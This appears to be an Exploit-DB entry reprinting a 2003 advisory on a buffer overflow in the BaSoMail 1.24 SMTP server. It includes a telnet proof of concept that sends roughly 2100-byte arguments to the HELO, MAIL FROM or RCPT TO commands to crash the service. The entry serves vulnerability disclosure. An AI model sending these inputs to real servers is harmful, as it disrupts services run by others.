BaSoMail 1.24 SMTP Server Command Buffer Overflow Vulnerability

2003-05-28T00:00:00
ID EDB-ID:22668
Type exploitdb
Reporter Ziv Kamir
Modified 2003-05-28T00:00:00

Description

BaSoMail 1.24 SMTP Server Command Buffer Overflow Vulnerability. Dos exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/7726/info

BaSoMail SMTP Server has been reported prone to a buffer overflow vulnerability.

The issue is likely due to a lack of sufficient bounds checking performed on arguments passed to SMTP commands.

Although unconfirmed and speculative, due to the nature of this vulnerability, it may be possible to exploit this issue to execute arbitrary attacker supplied code. 

# Telnet The_SMTP_Server_IP_Address 25
220 Welcome to BaSoMail (www.BaSo.no)
HELO <ccccc....[Buffer size 2100 Bytes]>
Or
Mail From : <ccccc....[Buffer size 2100 Bytes @xyz.com]>
Or
Rcpt to : <ccccc....[Buffer size 2100 Bytes @xyz.com]>
Quit